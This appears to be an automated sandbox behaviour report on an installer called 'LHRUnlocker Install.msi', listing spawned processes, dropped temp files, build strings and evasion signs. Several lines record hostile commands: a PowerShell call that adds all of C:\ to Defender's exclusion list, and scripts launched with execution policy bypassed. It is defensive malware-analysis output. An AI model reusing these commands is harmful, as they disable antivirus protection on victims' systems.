Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D930A47D56309F190C9E79168CF159A8 C
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding EE2A3AF825C1BBEBB4FC2081145CDAF4
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220223Jump to behavior
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIEF62.tmpJump to behavior
Source: classification engineClassification label: mal45.evad.winMSI@11/20@0/0
Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: LHRUnlocker Install.msiStatic file information: TRID: Microsoft Windows Installer (77509/1) 52.18%
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1504:120:WilError_01
Source: C:\Windows\System32\msiexec.exeAutomated click: Next >
Source: C:\Windows\System32\msiexec.exeAutomated click: Next >
Source: C:\Windows\System32\msiexec.exeAutomated click: Install
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: LHRUnlocker Install.msiStatic file information: File size 7207424 > 1048576
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\ShortcutFlags.pdb> source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdb\ source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr, MSI3268.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr, MSIF69B.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\FileOperations.pdb source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\ShortcutFlags.pdb source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\FileOperations.pdbj source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr, MSI3268.tmp.1.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb` source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr, MSIF69B.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF832.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF832.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: LHRUnlocker Install.msi, 3c1a5a.msi.1.dr
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00873168 push eax; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00878B31 push eax; retf
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF513.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF34C.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF280.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF69B.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3268.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2874.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIEF62.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF832.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1FD8.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF447.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3268.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2874.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1FD8.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6908Thread sleep count: 2777 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6908Thread sleep count: 366 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5612Thread sleep count: 39 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5736Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5736Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF513.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF34C.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF280.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2874.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF447.tmpJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2777
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 366
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: powershell.exe, 00000008.00000002.571424300.000000000545F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.570148293.0000000005001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
Source: MSIF69B.tmp.0.drBinary or memory string: RegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
Source: powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.571424300.000000000545F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.570148293.0000000005001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.569907486.0000000005463000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Cl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
